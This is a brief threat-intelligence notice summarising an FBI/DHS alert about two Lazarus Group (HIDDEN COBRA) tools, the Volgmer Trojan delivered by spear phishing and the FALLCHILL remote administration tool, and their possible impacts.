The Federal Bureau of Investigation (FBI) and Department of Homeland Security (DHS) have identified two tools used by the Advanced Persistent Threat Group, HIDDEN COBRA, better known as Lazarus Group. The first tool, Volgmer , is a Trojan capable of allowing the threat actor covert access to compromised systems and is delivered via targeted spear phishing emails. The second tool is a Remote Administration Tool (RAT) labeled FALLCHILL . This RAT is fully functional and able to issue a wide variety of commands from a C2 server to the victim’s device. The successful use of either tool may have sever impacts, including the loss of sensitive data, operational disruption and reputational damage.
For more information visit:
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.